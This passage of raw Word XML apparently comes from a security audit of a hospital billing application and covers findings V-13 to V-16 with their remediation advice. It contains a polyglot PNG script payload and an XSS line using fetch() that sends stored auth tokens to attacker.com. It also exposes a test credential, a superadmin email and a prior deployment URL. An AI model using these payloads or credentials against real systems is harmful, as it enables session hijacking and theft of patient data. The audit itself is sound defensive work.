  [Polyglot file: valid PNG header + embedded &lt;script&gt;alert(1)&lt;/script&gt;]
  Content-Type: image/png
  Response: HTTP 200 OK - file accepted
  File served as clinic branding on receipts and UI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement magic-byte validation using the python-magic library to confirm the binary file signature. After validation, open the image using Pillow (PIL), re-save it to a clean in-memory buffer to strip all metadata and normalise the image format, then persist the sanitised output. Use a server-generated filename (logo_{tenant_id}_{uuid4()}.ext) rather than the user-supplied filename.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="B7950B" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-13   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT Access Tokens Stored in localStorage (XSS Token Theft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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="B7950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MEDIUM</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4.8 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N)</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A07:2021 - Identification and Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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frontend/src/store/ (Zustand authStore)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The React frontend stores JWT access and refresh tokens in the browser's localStorage via the Zustand persistence middleware. The localStorage is fully accessible to any JavaScript executing within the page context, including scripts injected via XSS vulnerabilities. While no confirmed XSS vulnerability was identified in this assessment, the storage architecture means any future XSS finding would automatically enable complete session hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">If an XSS vulnerability is discovered or introduced in future updates, an attacker's injected script can trivially read the JWT token from localStorage and exfiltrate it to an attacker-controlled server. The stolen token can then be used to impersonate the victim - including administrative users with access to all patient and billing data - from any geographic location until token expiry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Zustand persist config in authStore.js:
  persist({ token: null, refreshToken: null },
    { name: "auth-storage" }  // Persists to localStorage
  )
XSS payload to steal token:
  fetch("https://attacker.com/steal?t=" +
    localStorage.getItem("auth-storage"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Migrate JWT storage from localStorage to HttpOnly, Secure, SameSite=Strict cookies. HttpOnly cookies cannot be read by JavaScript regardless of XSS vulnerabilities. This requires backend changes to set authentication cookies on login and refresh responses, and frontend changes to remove explicit token handling from the Zustand store. As an interim measure, implement a robust Content Security Policy (V-11) to reduce XSS attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D35400" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-14   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Sensitive Administrative Scripts in Public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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D35400"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HIGH</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7.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)</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A05:2021 - Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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create_superadmin.py, setup_demo_accounts.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The repository root contains create_superadmin.py and setup_demo_accounts.py - operational scripts that expose the internal API endpoint structure, all privileged account email addresses, the base URL of a prior deployment (hospital-billing-system-pccq.onrender.com), and data model schemas. The Git commit history preserves the original plaintext credential values from these scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Beyond the direct credential exposure addressed in V-01, these scripts constitute a significant operational security leak. The prior deployment URL may still be active and running an unpatched version of the application. The scripts confirm the existence of a super-admin role and reveal its email address. The combined information from these scripts dramatically reduces the reconnaissance burden for a targeted attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">setup_demo_accounts.py line 5:
  BASE_URL = "https://hospital-billing-system-pccq.onrender.com/api/v1"
  # Prior deployment URL - potentially still active and unpatched
create_superadmin.py:
  Confirms superadmin role, reveals email: superadmin@hospitalbilling.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove all administrative scripts from the public repository using git-filter-repo to purge them from the complete commit history across all branches. Verify the prior deployment URL is decommissioned or updated to the latest patched code. If operational scripts must remain accessible, host them in a private internal repository with restricted access and ensure they contain zero hardcoded values or deployment-specific references.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E8449" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-15   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Undefined Doctor Role RBAC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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>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LOW</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3.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N)</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A01:2021 - Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/api/v1/endpoints/*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Test credentials include a Doctor role (doctor@gmail.com) that is referenced in operational scripts but whose API endpoint permission boundary is not explicitly documented or verifiable from the accessible codebase. The specific endpoints accessible to this role, and whether it is properly isolated from administrative functions such as billing modification, patient deletion, or user management, cannot be confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">If the Doctor role has broader API access than operationally required, a compromised doctor account could be used to access administrative functions, modify billing records, or enumerate other users' data. The principle of least privilege dictates that each role should be explicitly scoped to only the operations it requires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Test credential: doctor@gmail.com / Doctor123
Role: Referenced in setup scripts, not defined in accessible source
Endpoint permissions: Not verifiable from available codebase
Risk: Potential access to admin-only operations via undocumented role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Document an explicit RBAC matrix defining the exact permitted endpoints for each role (Admin, Staff, Doctor, Super Admin). Implement a centralised permission check decorator or dependency applied to all sensitive endpoints. Conduct a full audit of all endpoints accessible to the Doctor role against the documented permission matrix to verify compliance with least-privilege principles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E8449" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-16   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Deployment Configuration Placeholder Values in render.yaml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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>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LOW</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2.0 (AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>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A05:2021 - Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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render.yaml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The render.yaml deployment configuration file contains placeholder CORS origin values ("https://your-staging-frontend-url.com" and "https://your-production-frontend-url.com") instead of actual deployment URLs. This indicates the CORS configuration has not been finalised for either environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">If the placeholder value is interpreted literally, it will block all legitimate frontend requests causing a service outage. If the deployment process silently ignores these values, the CORS restriction provides no security boundary. Either scenario results in incorrect CORS enforcement: either a complete denial of service or an unintentional open CORS policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">render.yaml lines 17-18:
  CORS_ORIGINS:
    value: "['https://your-staging-frontend-url.com']"
  # Placeholder - not a real deployment URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
